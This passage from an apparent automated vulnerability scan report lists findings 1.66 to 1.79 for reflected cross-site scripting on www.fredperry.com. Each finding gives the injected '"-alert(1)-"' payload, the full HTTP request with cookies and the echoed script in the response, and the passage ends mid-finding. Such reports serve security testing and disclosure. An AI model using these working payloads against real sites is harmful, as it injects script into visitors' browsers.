var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear/women/?e0969"-alert(1)-"29b7f4c9995=1");
//]]>
...[SNIP]...

1.66. http://www.fredperry.com/heritage/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /heritage/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53e6b"-alert(1)-"4e4750c7287 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /heritage53e6b"-alert(1)-"4e4750c7287/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=afjfsg3q3tnjk7fmq9un82i3k1; expires=Tue, 09-Nov-2010 17:15:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/heritage53e6b"-alert(1)-"4e4750c7287/");
//]]>
...[SNIP]...

1.67. http://www.fredperry.com/heritage/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /heritage/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c544"-alert(1)-"71287e91efc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /heritage/?3c544"-alert(1)-"71287e91efc=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:15:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hsq46ceu74v30ore5bqq9q21q2; expires=Tue, 09-Nov-2010 17:15:01 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Heritag
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/heritage/?3c544"-alert(1)-"71287e91efc=1");
//]]>
...[SNIP]...

1.68. http://www.fredperry.com/home/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /home/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8616c"-alert(1)-"7472e7ac244 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home8616c"-alert(1)-"7472e7ac244/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:24:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=14d13cht96sn9sc03rpij71181; expires=Tue, 09-Nov-2010 17:24:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/home8616c"-alert(1)-"7472e7ac244/");
//]]>
...[SNIP]...

1.69. http://www.fredperry.com/home/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6784a"-alert(1)-"467c737cd18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home/?6784a"-alert(1)-"467c737cd18=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:23:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l2h90hssa4fmthjqbs1gomlmj5; expires=Tue, 09-Nov-2010 17:23:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/home/?6784a"-alert(1)-"467c737cd18=1");
//]]>
...[SNIP]...

1.70. http://www.fredperry.com/js/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /js/index.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c636"-alert(1)-"401eb60e513 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js1c636"-alert(1)-"401eb60e513/index.php HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8m0oqsmc1sc72tf5e0msm0em36; expires=Tue, 09-Nov-2010 17:15:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/js1c636"-alert(1)-"401eb60e513/index.php");
//]]>
...[SNIP]...

1.71. http://www.fredperry.com/kids/kidswear/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/kidswear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efe09"-alert(1)-"3736105445 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kidsefe09"-alert(1)-"3736105445/kidswear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:24:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=kp6jr7pki4in7iu19bvd9202h2; expires=Tue, 09-Nov-2010 17:24:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kidsefe09"-alert(1)-"3736105445/kidswear/");
//]]>
...[SNIP]...

1.72. http://www.fredperry.com/kids/kidswear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/kidswear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4731"-alert(1)-"b278de41763 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids/kidsweard4731"-alert(1)-"b278de41763/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:24:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gds6c6cpusu9o67aien66qr4r4; expires=Tue, 09-Nov-2010 17:24:36 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kids/kidsweard4731"-alert(1)-"b278de41763/");
//]]>
...[SNIP]...

1.73. http://www.fredperry.com/kids/kidswear/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/kidswear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 561cd"-alert(1)-"d72a8d8d292 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids/kidswear/?561cd"-alert(1)-"d72a8d8d292=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:23:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=38gi6i5her1s7f5m53m7icsk66; expires=Tue, 09-Nov-2010 17:23:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Kidswea
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kids/kidswear/?561cd"-alert(1)-"d72a8d8d292=1");
//]]>
...[SNIP]...

1.74. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/my-first-fred-perry-shirt-overview/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 288b4"-alert(1)-"8dbdc0fd791 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids288b4"-alert(1)-"8dbdc0fd791/my-first-fred-perry-shirt-overview/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ndi6tjig427j9ttkm97l8sv4g2; expires=Tue, 09-Nov-2010 17:19:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kids288b4"-alert(1)-"8dbdc0fd791/my-first-fred-perry-shirt-overview/");
//]]>
...[SNIP]...

1.75. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/my-first-fred-perry-shirt-overview/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cfd0"-alert(1)-"3724550e2d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids/my-first-fred-perry-shirt-overview9cfd0"-alert(1)-"3724550e2d6/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ebbbjs2q6b6v1n8qrime7tb331; expires=Tue, 09-Nov-2010 17:19:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kids/my-first-fred-perry-shirt-overview9cfd0"-alert(1)-"3724550e2d6/");
//]]>
...[SNIP]...

1.76. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/my-first-fred-perry-shirt-overview/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c166e"-alert(1)-"1986b134245 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids/my-first-fred-perry-shirt-overview/?c166e"-alert(1)-"1986b134245=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1km5s4mm48jq61sf43il38u3s0; expires=Tue, 09-Nov-2010 17:18:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> My Firs
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kids/my-first-fred-perry-shirt-overview/?c166e"-alert(1)-"1986b134245=1");
//]]>
...[SNIP]...

1.77. http://www.fredperry.com/limited-edition/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b402"-alert(1)-"7cd71f3fd4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition1b402"-alert(1)-"7cd71f3fd4a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=mcf7qrdktlf5aa5olcbmpu7l76; expires=Tue, 09-Nov-2010 17:05:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition1b402"-alert(1)-"7cd71f3fd4a/");
//]]>
...[SNIP]...

1.78. http://www.fredperry.com/limited-edition/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7777c"-alert(1)-"313f3d97d63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/?7777c"-alert(1)-"313f3d97d63=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9s8uribp858p0bhp2ltgluj547; expires=Tue, 09-Nov-2010 17:04:47 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Limited
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/?7777c"-alert(1)-"313f3d97d63=1");
//]]>
...[SNIP]...

1.79. http://www.fredperry.com/limited-edition/men/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1808"-alert(1)-"761be49e7f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionb1808"-alert(1)-"761be49e7f3/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
